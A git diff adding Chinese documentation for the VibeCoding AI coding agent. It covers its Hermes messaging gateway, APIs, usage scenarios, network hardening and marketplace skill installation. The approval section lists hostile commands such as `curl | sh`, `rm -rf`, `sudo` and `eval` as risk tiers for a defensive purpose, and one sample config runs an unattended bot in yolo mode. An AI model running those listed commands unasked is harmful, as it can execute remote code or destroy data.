@@ -271,3 +283,4 @@ VibeCoding 可以通过 Agent Client Protocol (ACP) 集成到你的 IDE：
 - 了解 [安全模型](security.md) 保护你的系统
 - 探索 [技能系统](skills.md) 创建可复用提示片段
 - 设置 [IDE 集成](acp.md) 在 VS Code 或 JetBrains 中使用
+- 查看 [场景演示](scenarios.md) 了解各模式的实际用法
diff --git a/docs/zh/hermes.md b/docs/zh/hermes.md
new file mode 100644
index 0000000..096f287
--- /dev/null
+++ b/docs/zh/hermes.md
@@ -0,0 +1,443 @@
+# Hermes 模式
+
+## 概述
+
+Hermes 模式将 VibeCoding 作为**消息平台网关守护进程**运行，支持 WebSocket/HTTP API、微信、飞书和 A2A 协议。它将 VibeCoding 从编码助手扩展为可部署的自主代理。
+
+```bash
+vibecoding hermes start
+```
+
+## 快速开始
+
+```bash
+# 生成配置模板
+vibecoding hermes config init
+
+# 启动 hermes（前台）
+vibecoding hermes start
+
+# 启动 hermes（后台）
+vibecoding hermes start -d
+
+# 查看状态
+vibecoding hermes status
+
+# 停止 hermes
+vibecoding hermes stop
+
+# 以客户端连接
+vibecoding hermes client
+```
+
+## 架构
+
+```
+                    ┌─────────────────────────────────────┐
+                    │         Hermes 网关 (:8090)          │
+                    │                                     │
+                    │  ┌─────────┐  ┌─────────┐  ┌─────┐ │
+   微信 ───────────►│  │消息平台 │  │  HTTP   │  │ A2A │ │
+   飞书 ───────────►│  │适配器   │  │  REST   │  │     │ │
+                    │  └────┬────┘  └────┬────┘  └──┬──┘ │
+                    │       │            │          │     │
+                    │       └──────┬─────┘──────────┘     │
+                    │              ▼                       │
+                    │       ┌──────────┐                  │
+                    │       │  调度器   │                  │
+                    │       └────┬─────┘                  │
+                    │            ▼                        │
+                    │  ┌──────────────────┐               │
+                    │  │   Agent 循环     │               │
+                    │  │  (per-user)      │               │
+                    │  └──────────────────┘               │
+                    └─────────────────────────────────────┘
+```
+
+## CLI 命令
+
+### `hermes start`
+
+启动 Hermes 守护进程。
+
+| 标志 | 说明 |
+|------|------|
+| `-d` | 后台运行 |
+| `--port` | 监听端口（默认：配置值或 8090） |
+| `--work-dir` | 默认工作目录 |
+| `-p`, `--provider` | 覆盖默认 provider |
+| `-m`, `--model` | 覆盖默认 model |
+| `--multi-agent` | 启用子 Agent 工具 |
+| `--sandbox` | 启用 bwrap 沙箱 |
+| `--config` | hermes.json 路径 |
+| `--verbose` | 详细输出 |
+| `--debug` | 调试日志 |
+
+### `hermes stop`
+
+通过 PID 文件 + SIGTERM 停止运行中的 Hermes 守护进程。
+
+### `hermes status`
+
+检查 Hermes 守护进程状态（PID 检查 + HTTP health 查询）。
+
+### `hermes client`
+
+通过 WebSocket 连接到运行中的 Hermes 实例。
+
+| 标志 | 说明 |
+|------|------|
+| `--url` | WebSocket URL（默认：`ws://localhost:8090/ws`） |
+| `--session` | 要恢复的 session ID |
+
+**客户端命令：**
+- `/help` — 显示帮助
+- `/new` — 开始新 session
+- `/clear` — 清空当前 session
+- `/status` — 显示 session 状态
+- `/sessions` — 列出活跃 session
+- `/mode <mode>` — 设置模式（plan/agent/yolo）
+- `/compact` — 触发压缩
+- `/quit` — 退出
+
+### `hermes config`
+
+管理 Hermes 配置。
+
+```bash
+vibecoding hermes config init              # 创建全局配置模板
+vibecoding hermes config init --project    # 创建项目配置模板
+vibecoding hermes config show              # 查看生效配置
+```
+
+### `hermes wechat`
+
+管理微信 iLink 连接。
+
+```bash
+vibecoding hermes wechat login             # 扫码登录
+vibecoding hermes wechat login --force     # 强制重新登录
+vibecoding hermes wechat status            # 查看连接状态
+```
+
+### `hermes feishu`
+
+管理飞书连接。
+
+```bash
+vibecoding hermes feishu setup             # 显示配置指南
+vibecoding hermes feishu status            # 查看连接状态
+```
+
+### `hermes webhook`
+
+管理 webhook 路由。
+
+```bash
+vibecoding hermes webhook list             # 列出配置的路由
+```
+
+### `hermes memory`
+
+管理持久化记忆。
+
+```bash
+vibecoding hermes memory show              # 查看 memory.md 内容
+vibecoding hermes memory clear             # 重置 memory.md
+```
+
+### `hermes sessions`
+
+管理 session。
+
+```bash
+vibecoding hermes sessions list            # 列出活跃 session（查询运行实例）
+```
+
+### `hermes cron`
+
+管理定时任务。
+
+```bash
+vibecoding hermes cron list                # 列出所有定时任务
+vibecoding hermes cron add <name> <prompt> # 添加定时任务
+vibecoding hermes cron remove <id>         # 删除定时任务
+vibecoding hermes cron enable <id>         # 启用定时任务
+vibecoding hermes cron disable <id>        # 禁用定时任务
+```
+
+## 配置
+
+### `hermes.json`
+
+Hermes 模式的配置文件。支持全局 + 项目级覆盖。
+
+**位置：**
+- 全局：`<GLOBAL_DIR>/hermes.json`
+- 项目：`.vibe/hermes.json`（覆盖全局）
+
+```jsonc
+{
+  "server": {
+    "port": 8090,
+    "host": "0.0.0.0",
+    "auth_token": ""
+  },
+  "default_provider": "",
+  "default_model": "",
+  "multi_agent": false,
+  "sandbox": false,
+  "wechat": {
+    "enabled": false,
+    "cred_path": "",
+    "work_dir": "",
+    "allowed_users": [],
+    "auto_typing": true
+  },
+  "feishu": {
+    "enabled": false,
+    "app_id": "",
+    "app_secret": "",
+    "work_dir": "",
+    "allowed_users": []
+  },
+  "webhooks": {
+    "enabled": false,
+    "secret": "",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "feishu",
+        "delivery_target": "chat_id"
+      }
+    ]
+  },
+  "a2a": {
+    "enabled": false,
+    "port": 8093
+  },
+  "cron": {
+    "enabled": true
+  },
+  "memory": {
+    "enabled": true,
+    "path": ""
+  },
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []
+  },
+  "hooks": {
+    "pre_tool_call": "",
+    "post_tool_call": ""
+  },
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true,
+    "budget_pressure_threshold": 0.20,
+    "context_pressure_threshold": 0.55
+  },
+  "work_dir": "."
+}
+```
+
+### 配置优先级
+
+```
+CLI 标志 > hermes.json（项目） > hermes.json（全局） > 默认值
+```
+
+### 工作目录优先级
+
+```
+平台 work_dir（微信/飞书） > 全局 work_dir > CLI --work-dir > 当前目录
+```
+
+## 消息平台
+
+### 微信（iLink 协议）
+
+- 零外部依赖（仅 Go 标准库）
+- 扫码登录，凭证保存到 `<GLOBAL_DIR>/wechat-credentials.json`
+- 长轮询接收消息（无需公网 IP）
+- 过期自动重新登录
+- 支持打字指示器
+
+### 飞书
+
+- 官方 SDK：`github.com/larksuite/oapi-sdk-go/v3`
+- WebSocket 长连接（无需公网 IP）
+- 支持文本消息
+- 自动重连
+
+## WebSocket API
+
+### 连接
+
+```
+ws://localhost:8090/ws?session=<session_id>
+```
+
+配置 `server.auth_token` 后，应在 WebSocket 握手时通过 HTTP header 发送 token：
+
+```http
+Authorization: Bearer <auth_token>
+```
+
+旧的 `?token=` query 参数仍兼容，但推荐使用 header，避免 token 暴露在 URL 和日志中。
+
+### 客户端 → 服务端消息
+
+```jsonc
+// 聊天消息
+{"type": "message", "content": "帮我看看这段代码"}
+
+// 斜杠命令
+{"type": "command", "content": "/new"}
+
+// 审批响应
+{"type": "approval", "approval_id": "ap_xxx", "approved": true}
+
+// 心跳
+{"type": "ping"}
+```
+
+### 服务端 → 客户端消息
+
+```jsonc
+// 连接确认
+{"type": "connected", "session_id": "...", "version": "..."}
+
+// 流式文本
+{"type": "text_delta", "content": "让我帮你..."}
+
+// 思考过程
+{"type": "think_delta", "content": "分析代码..."}
+
+// 工具调用
+{"type": "tool_call", "tool": "read", "call_id": "...", "args": {"path": "main.go"}}
+
+// 工具结果
+{"type": "tool_result", "tool": "read", "call_id": "...", "result": "..."}
+
+// 文件 diff
+{"type": "tool_diff", "call_id": "...", "path": "main.go", "diff": "..."}
+
+// 审批请求（高风险）
+{"type": "approval_request", "approval_id": "ap_xxx", "tool": "bash", "args": {...}}
+
+// 用量统计
+{"type": "usage", "prompt_tokens": 1200, "completion_tokens": 350}
+
+// 轮次完成
+{"type": "done", "stop_reason": "end_turn"}
+
+// 状态消息
+{"type": "status", "message": "触发压缩"}
+
+// 命令响应
+{"type": "command_result", "command": "/new", "message": "✅ 新 session 已创建"}
+
+// 错误
+{"type": "error", "message": "provider error"}
+
+// 心跳响应
+{"type": "pong"}
+```
+
+## HTTP REST API
+
+| 端点 | 方法 | 认证 | 说明 |
+|------|------|------|------|
+| `/api/health` | GET | 否 | 健康检查 |
+| `/api/status` | GET | 是 | 服务状态 |
+| `/api/sessions` | GET | 是 | 列出活跃 session |
+| `/api/sessions/{id}` | GET | 是 | session 详情 |
+| `/api/sessions/{id}` | DELETE | 是 | 删除 session |
+| `/api/memory` | GET | 是 | 读取 memory.md |
+| `/api/memory` | PUT | 是 | 更新 memory.md |
+| `/api/platforms` | GET | 是 | 平台状态 |
+| `/webhook/*` | POST | Secret | Webhook 入站 |
+
+## 智能审批
+
+工具调用的分级风险分类：
+
+| 风险等级 | WebSocket | 消息平台 |
+|----------|-----------|----------|
+| Low | 自动批准 | 自动批准 |
+| Medium | 自动批准 + 通知 | 自动批准 + 通知 |
+| High | `approval_request` → 等待响应（5 分钟超时） | 自动拒绝 + 通知 |
+
+**风险分类：**
+- **Low**：`go`、`make`、`npm`、`git status/log/diff`、`ls`、`cat`、`grep`、`find`
+- **Medium**：`mv`、`cp -r`、`git push`、`docker`、`curl`、`ssh`
+- **High**：`rm -rf`、`sudo`、`shutdown`、`curl | sh`、`eval`、`exec`
+
+## 压力系统
+
+### Context Pressure
+
+当 context 使用率超过阈值（默认 55%）时触发 `EventContextPressure`。
+
+```jsonc
+{
+  "agent": {
+    "context_pressure": true,
+    "context_pressure_threshold": 0.55
+  }
+}
+```
+
+### Budget Pressure
+
+当剩余迭代次数达到阈值（默认 20%）时触发 `EventBudgetPressure`。
+
+```jsonc
+{
+  "agent": {
+    "budget_pressure": true,
+    "budget_pressure_threshold": 0.20
+  }
+}
+```
+
+两者都是一次性事件：每个阈值越界只触发一次，非每轮触发。
+
+## Memory
+
+持久化记忆存储为 `memory.md`（Markdown 格式，人类可读）。
+
+**查找优先级：**
+1. `memory.path` 配置 → 显式路径
+2. `.vibe/memory.md` → 项目记忆
+3. `<GLOBAL_DIR>/memory.md` → 全局记忆
+
+**Section：**
+- `## User Profile` — 用户偏好
+- `## Working Memory` — 当前上下文
+- `## Lessons Learned` — 积累的知识
+
+**默认：** 写入 `.vibe/memory.md`（项目目录）。
+
+## Session 管理
+
+- 每个 `platform:user_id` 一个持久 session
+- `/new` 归档当前 session 并创建新 session
+- Session 存储在 `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`
+- Context 窗口满时自动压缩
+
+## A2A 协议
+
+详见 [A2A 文档](a2a.md)。
+
+## 安全
+
+- **用户白名单**：per-platform `allowed_users`
+- **Auth Token**：HTTP/WebSocket API 的 Bearer token
+- **Allowed Work Dirs**：限制工作目录
+- **Shell Hooks**：pre/post tool call 外部脚本
+- **智能审批**：分级风险分类
diff --git a/docs/zh/scenarios.md b/docs/zh/scenarios.md
new file mode 100644
index 0000000..ccdb55b
--- /dev/null
+++ b/docs/zh/scenarios.md
@@ -0,0 +1,554 @@
+# 场景演示
+
+本文档通过实际场景演示 VibeCoding 的各种使用模式。
+
+---
+
+## 场景 1：日常写代码（单 Agent 模式）
+
+最基础的使用方式——在终端中与 AI 对话，完成日常开发任务。
+
+### 环境准备
+
+```bash
+# 设置 API 密钥
+export DEEPSEEK_API_KEY=sk-...
+
+# 进入项目目录
+cd ~/projects/myapp
+```
+
+### 场景 A：代码解释
+
+```bash
+$ vibecoding "解释 internal/agent/agent.go 的核心逻辑"
+```
+
+VibeCoding 会：
+1. 加载上下文文件（`AGENTS.md`、`CLAUDE.md`）
+2. 用 `read` 读取文件
+3. 用 `ls`、`grep` 探索相关代码
+4. 输出结构化的解释
+
+### 场景 B：修复 Bug
+
+```bash
+$ vibecoding
+```
+
+```
+> 修复 handler.go 中的空指针错误
+
+[Agent]
+  📄 read("internal/handler.go", offset=45, limit=20)
+  → 发现第 52 行未检查 err 是否为 nil
+
+  📝 edit("internal/handler.go", edits=[
+    {oldText: "resp, _ := client.Do(req)", newText: "resp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}"}
+  ])
+  → 编辑成功
+
+  🔧 bash("go build ./...")
+  → 编译通过
+
+✅ 已修复：在第 52 行添加了错误检查
+```
+
+### 场景 C：添加新功能
+
+```
+> 给 HTTP handler 添加 /health 端点
+
+[Agent]
+  📄 plan(title="添加 /health 端点", steps=[
+    {title: "阅读现有 handler 结构", status: "running"},
+    {title: "添加 health handler", status: "pending"},
+    {title: "注册路由", status: "pending"},
+    {title: "添加测试", status: "pending"},
+    {title: "验证编译", status: "pending"}
+  ])
+
+  📄 read("internal/server/routes.go")
+  📝 edit(...)  # 添加 handler
+  📝 edit(...)  # 注册路由
+  🔧 bash("go test ./internal/server/ -run TestHealth")
+  🔧 bash("go build ./...")
+
+  📄 plan(..., steps=[..., {title: "验证编译", status: "done"}])
+
+✅ 完成：/health 端点已添加并测试通过
+```
+
+### 模式选择建议
+
+| 任务 | 推荐模式 | 命令 |
+|------|---------|------|
+| 阅读代码、学习项目 | `plan` | `vibecoding --mode plan` |
+| 写代码、修 bug | `agent`（默认） | `vibecoding` |
+| 安装依赖、系统操作 | `yolo` | `vibecoding --mode yolo` |
+
+---
+
+## 场景 2：非交互模式（CI/脚本集成）
+
+在 CI 流水线或脚本中使用 VibeCoding。
+
+### 场景 A：代码审查
+
+```bash
+# 在 CI 中审查 PR
+git diff main..feature | vibecoding -P "审查这个 diff，指出潜在问题"
+```
+
+### 场景 B：自动重构
+
+```bash
+# 批量重构
+vibecoding -P "将所有 fmt.Errorf 调用改为使用 %w 包装错误" --mode yolo
+```
+
+### 场景 C：生成文档
+
+```bash
+# 为包生成 README
+vibecoding -P "为 internal/cache 包生成 README.md，包括使用示例" --mode yolo
+```
+
+---
+
+## 场景 3：多 Agent 模式（复杂任务委托）
+
+通过 `--multi-agent` 启用子 Agent 工具，将复杂任务拆分并行执行。
+
+### 启动
+
+```bash
+$ vibecoding --multi-agent
+```
+
+### 场景：并行重构和测试
+
+```
+> 我需要：1) 将 internal/cache 包重命名为 internal/store
+>        2) 同时确保所有测试通过
+
+[Agent]
+  🤖 subagent_spawn(task="将 internal/cache 重命名为 internal/store，更新所有导入路径",
+                     mode="agent",
+                     tools=["read", "write", "edit", "bash", "grep", "find"])
+
+  → 返回 handle: "agent-1"
+
+  🤖 subagent_spawn(task="运行完整测试套件，报告失败的测试",
+                     mode="agent",
+                     tools=["read", "bash", "grep", "find"])
+
+  → 返回 handle: "agent-2"
+
+  ... 等待子 Agent 完成 ...
+
+  🤖 subagent_status(handle="agent-1")
+  → 状态: completed
+  → 结果: "已将 cache 包重命名为 store，更新了 15 个文件的导入路径"
+
+  🤖 subagent_status(handle="agent-2")
+  → 状态: completed
+  → 结果: "3 个测试失败：TestCacheGet, TestCacheSet, TestCacheDelete"
+
+  🤖 subagent_send(handle="agent-1", message="修复 agent-2 报告的 3 个失败测试")
+
+  ... 子 Agent 继续工作 ...
+
+✅ 完成：包已重命名，所有测试通过
+```
+
+### 子 Agent 工具汇总
+
+| 工具 | 用途 |
+|------|------|
+| `subagent_spawn` | 启动子 Agent，返回 handle |
+| `subagent_status` | 查询子 Agent 状态和结果 |
+| `subagent_send` | 向子 Agent 发送后续指令 |
+| `subagent_destroy` | 停止并清理子 Agent |
+
+### 多 Agent + Cron 定时任务
+
+```bash
+# 每天早上运行代码审查
+vibecoding hermes cron add "daily-review" \
+  "审查最近 24 小时的 git 变更，输出问题报告" \
+  --schedule "@daily"
+```
+
+---
+
+## 场景 4：VS Code ACP 集成
+
+在 VS Code 中直接使用 VibeCoding 作为 AI 编码助手。
+
+### 步骤 1：安装
+
+```bash
+npm install -g vibecoding-installer
+```
+
+### 步骤 2：配置 VS Code
+
+编辑 VS Code 的 `settings.json`：
+
+```json
+{
+  "acp.agents": {
+    "vibecoding": {
+      "command": "vibecoding",
+      "args": ["acp", "--mode", "agent", "--multi-agent"],
+      "description": "VibeCoding AI Assistant"
+    }
+  }
+}
+```
+
+### 步骤 3：使用
+
+1. 在 VS Code 中打开项目
+2. 打开 ACP 面板（通过扩展）
+3. 直接提问或请求代码更改
+
+**VS Code 中的体验：**
+
+```
+你: 将 utils.go 中的 ParseConfig 函数改为支持 YAML 格式
+
+VibeCoding:
+  [tool_call: read utils.go]
+  [tool_call: edit utils.go]
+  [tool_call: bash "go test ./..."]
+  ✅ 已添加 YAML 支持，所有测试通过
+```
+
+### ACP 模式的特殊能力
+
+| 能力 | 说明 |
+|------|------|
+| 会话管理 | IDE 自动管理会话的创建、加载、继续 |
+| 权限请求 | 高风险操作时 IDE 弹窗确认 |
+| MCP 集成 | IDE 可传入 MCP 服务器配置 |
+| 多 Agent | 通过 `--multi-agent` 启用子 Agent 工具 |
+
+---
+
+## 场景 5：A2A 独立服务器模式
+
+将 VibeCoding 作为 A2A 服务器运行，供其他 Agent 调用。
+
+### 场景 A：启动独立 A2A 服务器
+
+```bash
+# 初始化配置
+vibecoding a2a --init-a2a-config
+
+# 编辑 a2a.json（可选）
+vim ~/.vibecoding/a2a.json
+
+# 启动服务器
+vibecoding a2a start --port 8093 --work-dir ~/projects/myapp
+```
+
+### 场景 B：其他 Agent 调用
+
+```bash
+# 用 vibecoding 客户端
+vibecoding a2a send "列出项目中的所有 Go 文件" --target http://localhost:8093
+
+# 用 curl
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "运行所有测试"}]
+      }
+    },
+    "id": 1
+  }'
+
+# 发现远程 Agent 能力
+vibecoding a2a discover http://localhost:8093
+```
+
+### 场景 C：带认证的 A2A 服务器
+
+```bash
+# 启动带 Token 认证的服务器
+vibecoding a2a start --auth-token "my-secret-token-xxx"
+
+# 客户端调用时传 Token
+vibecoding a2a send "review main.go" \
+  --target http://remote-server:8093 \
+  --auth-token "my-secret-token-xxx"
+```
+
+---
+
+## 场景 6：A2A Master 模式（跨机器 Agent 调度）
+
+管理多个远程 A2A Agent，让 LLM 自动分发任务。
+
+### 架构
+
+```
+┌─────────────────────────────────────────────────────────┐
+│  本机 (VibeCoding + A2A Master)                          │
+│                                                         │
+│  vibecoding --enable-a2a-master                         │
+│  ┌─────────────────────────────────────────────────┐   │
+│  │  LLM 自动决策 → a2a_dispatch tool                │   │
+│  └─────────────────────────────────────────────────┘   │
+│           │                   │                         │
+│           ▼                   ▼                         │
+│  ┌──────────────┐   ┌──────────────┐                   │
+│  │ code-reviewer│   │  ci-agent    │                   │
+│  │ 192.168.1.10 │   │ 192.168.1.20 │                   │
+│  │ :8093        │   │ :8093        │                   │
+│  └──────────────┘   └──────────────┘                   │
+└─────────────────────────────────────────────────────────┘
+```
+
+### 步骤 1：在远程机器上启动 A2A 服务器
+
+**机器 A（代码审查 Agent）：**
+```bash
+# 192.168.1.10
+vibecoding a2a start --port 8093 --work-dir ~/projects/shared
+```
+
+**机器 B（CI Agent）：**
+```bash
+# 192.168.1.20
+vibecoding a2a start --port 8093 --work-dir ~/ci-runner --auth-token "ci-secret"
+```
+
+### 步骤 2：本机初始化 Master 配置
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 编辑 a2a-list.json
+vim ~/.vibecoding/a2a-list.json
+```
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://192.168.1.10:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://192.168.1.20:8093",
+      "auth_token": "ci-secret"
+    }
+  ]
+}
+```
+
+### 步骤 3：启用 Master 模式
+
+```bash
+$ vibecoding --enable-a2a-master --verbose
+```
+
+```
+A2A master mode enabled: 2 agents loaded from /home/user/.vibecoding/a2a-list.json
+
+> 帮我审查 internal/handler.go 的代码质量，然后运行测试确保没问题
+
+[Agent]
+  我需要将任务分发给两个远程 Agent：
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="审查 internal/handler.go 的代码质量，关注错误处理、
+                           性能和安全性")
+
+  → code-reviewer 返回: "发现 3 个问题：1) 第 45 行未处理超时..."
+
+  🔧 a2a_dispatch(agent_name="ci-agent",
+                   message="运行项目的完整测试套件，报告结果")
+
+  → ci-agent 返回: "47/47 测试通过，覆盖率 82%"
+
+✅ 综合结果：
+- 代码审查发现 3 个问题（已列出详情）
+- 所有测试通过，覆盖率 82%
+- 建议优先修复第 45 行的超时处理
+```
+
+### 实际对话示例
+
+```
+> 分析项目结构，然后让审查 agent 看看有没有架构问题
+
+[Agent]
+  📄 ls(".")
+  📄 read("go.mod")
+  📄 find("*.go", maxDepth=2)
+
+  → 了解了项目结构
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="这个 Go 项目的结构如下：[项目结构摘要]。
+                           请从架构角度分析是否有改进空间，
+                           特别关注包的职责划分和依赖关系。")
+
+  → code-reviewer: "建议：1) internal/api 和 internal/handler 存在职责重叠..."
+
+✅ 以下是架构改进建议...
+```
+
+---
+
+## 场景 7：Gateway 模式（HTTP API）
+
+将 VibeCoding 作为 OpenAI 兼容的 HTTP 服务，供其他应用调用。
+
+### 初始化和启动
+
+```bash
+# 生成配置模板
+vibecoding --init-gateway
+
+# 编辑 gateway.json（设置 token、端口等）
+vim ~/.vibecoding/gateway.json
+
+# 启动网关
+vibecoding gateway --port 8080 --work-dir ~/projects/myapp
+```
+
+### 调用
+
+```bash
+# 用 curl（OpenAI 兼容格式）
+curl http://localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-token" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [
+      {"role": "user", "content": "解释这个项目的架构"}
+    ]
+  }'
+
+# 用 Python OpenAI SDK
+from openai import OpenAI
+client = OpenAI(base_url="http://localhost:8080/v1", api_key="your-token")
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "写一个 HTTP 中间件"}]
+)
+```
+
+---
+
+## 场景 8：Hermes 消息平台网关
+
+将 VibeCoding 接入微信/飞书，实现无人值守的 AI 编码助手。
+
+### 启动
+
+```bash
+# 配置 hermes.json
+vim ~/.vibecoding/hermes.json
+
+# 启动
+vibecoding hermes start
+```
+
+### 典型配置
+
+```json
+{
+  "server": { "port": 8090, "auth_token": "my-token" },
+  "platforms": {
+    "wechat": { "enabled": true },
+    "feishu": { "enabled": true, "app_id": "...", "app_secret": "..." }
+  },
+  "default_mode": "yolo",
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": ["/srv/projects"]
+  },
+  "a2a": { "enabled": true },
+  "cron": { "enabled": true },
+  "memory": { "enabled": true }
+}
+```
+
+### 在消息平台中使用
+
+```
+用户: /new
+Bot:   新会话已创建
+
+用户: 帮我给 api 包添加速率限制中间件
+Bot:   [执行中...]
+       ✅ 已添加速率限制中间件，支持可配置的请求/秒限制
+       修改文件：internal/api/middleware.go, internal/api/routes.go
+
+用户: 运行测试
+Bot:   [执行 go test ./...]
+       ✅ 全部通过 (12/12)
+```
+
+---
+
+## 场景 9：组合模式（多工具协同）
+
+将多种模式组合使用，构建完整的开发工作流。
+
+### 示例：开发 + 审查 + 部署
+
+```bash
+# 1. 本地开发（TUI 模式）
+cd ~/projects/myapp
+vibecoding --mode yolo
+
+# 2. 提交前审查（Plan 模式）
+vibecoding --mode plan "审查 git diff 中的所有变更"
+
+# 3. 推送后 CI 自动审查（Gateway 模式）
+# CI 脚本中：
+curl http://gateway:8080/v1/chat/completions \
+  -d '{"messages": [{"role": "user", "content": "审查 PR #42 的代码"}]}'
+
+# 4. 定时巡检（Hermes + Cron）
+vibecoding hermes cron add "security-scan" \
+  "扫描项目中的安全漏洞和敏感信息泄露" \
+  --schedule "@weekly"
+```
+
+---
+
+## 常用命令速查
+
+| 场景 | 命令 |
+|------|------|
+| 日常编码 | `vibecoding` |
+| 只读分析 | `vibecoding --mode plan` |
+| 完全访问 | `vibecoding --mode yolo` |
+| 非交互 | `vibecoding -P "..."` |
+| 多 Agent | `vibecoding --multi-agent` |
+| A2A 服务器 | `vibecoding a2a start` |
+| A2A Master | `vibecoding --enable-a2a-master` |
+| HTTP 网关 | `vibecoding gateway` |
+| 消息平台 | `vibecoding hermes start` |
+| IDE 集成 | `vibecoding acp` |
+| 继续会话 | `vibecoding -c` |
+| 恢复会话 | `vibecoding -r <id>` |
+| 生成配置 | `vibecoding --init-gateway` |
+| 生成 A2A 配置 | `vibecoding a2a --init-a2a-config` |
+| 生成 Master 配置 | `vibecoding --init-a2a-master-config` |
diff --git a/docs/zh/security.md b/docs/zh/security.md
index a57cf7b..8790909 100644
--- a/docs/zh/security.md
+++ b/docs/zh/security.md
@@ -123,6 +123,25 @@ vibecoding -M yolo
 - 可能执行危险命令
 - 可能泄露敏感信息
 
+## 网络服务加固
+
+Gateway、Hermes 和 A2A 都可能暴露 HTTP/WebSocket 入口。当工具运行在 `agent` 或 `yolo` 模式时，应将这些服务视为远程代码执行入口来保护。
+
+- **Gateway**：对 loopback 以外地址暴露前应启用 `auth.enabled`；当 Gateway 在非 loopback 地址、`yolo` 模式且未认证时，启动会输出警告。
+- **A2A**：独立 A2A 默认绑定 `127.0.0.1`。只有明确需要对外暴露时才使用 `--host 0.0.0.0`，并配置 auth token。
+- **Hermes WebSocket**：WebSocket 握手时使用 `Authorization: Bearer <token>` 发送 token。Query-string token 仅作为兼容方式保留。
+- **工作目录**：使用 `allowedWorkDirs` / `allowed_work_dirs` 限制请求级或平台级工作目录。
+
+## 可信配置中的 Shell 命令
+
+Provider API key 支持通过 `apiKey: "!command"` 从 shell 命令读取，但默认关闭。仅在可信本地配置中启用：
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+共享配置更推荐使用 `${DEEPSEEK_API_KEY}` 这样的环境变量引用。
+
 ## 启用沙箱
 
 ### 命令行方式
diff --git a/docs/zh/skillhub.md b/docs/zh/skillhub.md
new file mode 100644
index 0000000..b619059
--- /dev/null
+++ b/docs/zh/skillhub.md
@@ -0,0 +1,220 @@
+# 在线 Skill 市场集成
+
+VibeCoding 兼容市面上的 Skill 市场（SkillHub / ClawHub），可以直接使用这些平台发布的技能包。
+
+| 平台 | 地址 | 区域 |
+|------|------|------|
+| **SkillHub** | [https://skillhub.cn](https://skillhub.cn/) | 中国 |
+| **ClawHub** | [https://clawhub.ai](https://clawhub.ai/) | 海外 |
+
+> **说明：** VibeCoding 不内建 Skill 市场，但采用标准的技能目录格式（`SKILL.md`），
+> 与 SkillHub / ClawHub 发布的技能包完全兼容。从市场下载的技能放入技能目录即可直接使用，
+> 无需任何额外适配。
+
+本指南涵盖：
+
+1. [从市场安装技能](#从市场安装技能) — 三步完成
+2. [技能格式兼容](#技能格式兼容) — 标准格式说明
+3. [本地技能系统](#本地技能系统) — 已实现的功能
+4. [Cron 基础设施](#cron-基础设施) — 定时任务基础
+
+---
+
+## 从市场安装技能
+
+从 SkillHub / ClawHub 安装技能只需三步：
+
+### 1. 下载技能包
+
+从市场下载技能包（通常是一个包含 `SKILL.md` 的目录或压缩包）。
+
+### 2. 解压到技能目录
+
+```bash
+# 全局安装（所有项目可用）
+# Linux/macOS:
+unzip go-expert.zip -d ~/.vibecoding/skills/
+# Windows:
+Expand-Archive go-expert.zip -DestinationPath "$env:APPDATA\vibecoding\skills\"
+
+# 项目级安装（仅当前项目可用）
+unzip go-expert.zip -d .skills/
+```
+
+### 3. 验证安装
+
+```
+> /skills
+Loaded 3 skills:
+  - go-expert (global)        ← 刚安装的
+  - coding-standards (global)
+  - project-conventions (project)
+```
+
+就这么简单。技能已被自动加载并注入系统提示词。
+
+---
+
+## 技能格式兼容
+
+VibeCoding 的技能格式与 SkillHub / ClawHub 标准完全一致：
+
+```
+skill-name/
+├── SKILL.md              # 必需：技能定义文件
+└── references/           # 可选：按需加载的参考文件
+    ├── api-guide.md
+    └── examples.md
+```
+
+### SKILL.md 标准格式
+
+```markdown
+# 技能名称
+
+简短描述。
+
+## 规则
+
+- 规则 1
+- 规则 2
+
+## 示例
+
+...
+```
+
+### 参考文件
+
+技能可以包含 `references/` 目录下的参考文件，通过 `skill_ref` 工具按需加载：
+
+```
+> skill_ref(skill="go-expert", ref="references/api-guide.md")
+→ 返回 api-guide.md 的内容
+```
+
+这允许技能包含大量参考资料而不占用系统提示词空间。
+
+---
+
+## 本地技能系统
+
+除了从市场下载，你也可以直接创建本地技能。
+
+### 技能目录
+
+| 类型 | 位置 | 作用域 |
+|------|------|--------|
+| 全局 | `~/.vibecoding/skills/`（Linux/macOS）或 `%APPDATA%\vibecoding\skills\`（Windows） | 所有项目 |
+| 项目 | `.skills/`（项目根目录） | 当前项目，覆盖同名全局技能 |
+
+### 创建技能
+
+```bash
+mkdir -p ~/.vibecoding/skills/go-expert
+cat > ~/.vibecoding/skills/go-expert/SKILL.md << 'EOF'
+# Go Expert
+
+专家级 Go 编码规范。
+
+## 规则
+
+- 使用 `gofmt` 格式化代码
+- 遵循 Effective Go 指南
+- 返回错误，不要 panic
+- 使用 `fmt.Errorf` 和 `%w` 包装错误
+
+## 测试
+
+- 编写表驱动测试
+- 使用 `t.Run` 子测试
+- 目标覆盖率 >80%
+EOF
+```
+
+### 使用技能
+
+```
+> /skills
+已加载 2 个技能:
+  - go-expert (全局)
+  - project-conventions (项目)
+
+> /skill:go-expert
+已加载技能: go-expert
+```
+
+### 配置
+
+在 `settings.json` 中配置全局技能目录：
+
+```json
+{
+  "skillsDir": "~/.vibecoding/skills"
+}
+```
